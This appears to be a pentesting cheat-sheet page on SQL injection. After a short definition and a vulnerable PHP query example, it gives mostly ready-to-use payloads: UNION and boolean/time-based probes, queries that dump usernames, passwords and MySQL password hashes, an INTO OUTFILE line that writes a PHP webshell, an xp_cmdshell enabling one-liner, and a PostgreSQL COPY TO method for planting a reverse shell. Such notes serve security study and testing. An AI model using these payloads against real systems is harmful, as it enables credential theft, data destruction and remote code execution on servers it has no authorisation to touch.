SQL Injection

What is SQL Injection

SQL Injection is a type of cybersecurity vulnerability where an attacker manipulates a SQL query by injecting malicious SQL code into user inputs (e.g., login forms, search boxes) that are not properly sanitized. This allows the attacker to bypass authentication, access, modify, or delete database data, or even execute administrative operations on the database. SQL injection exploits occur when applications fail to validate or escape user-supplied input, making it possible to alter the intended behavior of SQL queries.

Video explaination

Types of SQL Injection

SQL Injection during code review

Below you can find examples of unsafe code leading to SQL Injection.

If you want to correct the sanatize the input and do not use string concatenation.

$username = $_GET['username'];

$sql = "SELECT * FROM users WHERE username = '$username'"; # case 1
$sql = "SELECT * FROM users WHERE username = " + $username; # case 2

Exploiting SQL Injection

Fuzz String

'+!@#$

Most of the time SQL Injections differ from the regular ones. Do not paste payloads thoughtlessly - match them to your specific case.

STACKED QUERIES

SELECT * FROM BOOKS WHERE ID1; DELETE FROM PRODUCTS;

UNION Keyword

It has to contain same amount of columns as the original query.
The data types need to be compatible between each column.
You can try to cast string as int e.g. in PostgreSQL

Determine number of columns with order by (increase the number until it fails):

' ORDER BY 1-- //

Sample final query:

If application does not return the output from given command it can me data type mismatch try to change the place of executed command.

%' UNION SELECT database(), user(), @@version, null, null -- //

Dumping other tables example

' UNION SELECT null, username, password, description, null FROM users -- //

IN KEYWORD

' or 1=1 in (SELECT password FROM users) -- //

BOOLEAN BASED

If outputs of the payloads differ application is probably vulnerable to SQL Injection.

Payload 1:

admin' AND 1=1 -- //

Payload 2:

admin' AND 1=2 -- //

TIME BASED

Change response times to avoid false positives.

admin' AND IF (1=1, sleep(3),'false') -- //

Useful SQL commands

mysql -u <USER> -p'<PASSWORD>' -h <IP> -P <PORT> # database connection

select version(); // show database version
select system_user(); // show current database user
show databases; // show databases
SELECT user, authentication_string FROM mysql.user WHERE user = '<USER>'; // users password

Additional info about hidden system tables in MSSQL:

https://www.geeksforgeeks.org/system-tables-in-sql/

impacket-mssqlclient <USER>:<PASSWORD>@<IP> -windows-auth

SELECT @@version; // show database version
SELECT name FROM sys.databases; // show databases
SELECT * FROM <DATABASE>.information_schema.tables; // show tables

Manual Code Execution

Common locations: ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www')

INTO OUTFILE

In some cases you can spawn the webshell using SQL Injection.

' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //

You can try to turn on xp_cmdshell using oneliner ; EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE; EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE; -- -

If xp_cmdshell is set to True we are able to execute shell commands on the system.

EXECUTE xp_cmdshell 'whoami';

You can obtain reverse shell using COPY TO method (by providing malicious file and saving it to the system):

copy (select convert_from(decode($$ENCODED_PAYLOAD$$,$$base64$$),$$utf-8$$)) to $$REVERSE_SHELL_PATH$$;

Another way to obtain RCE is uploading compiled malicious extension (.dll):

// TODO

PreviousCreating your own exploit / gadget NextCode review

Last updated 8 months ago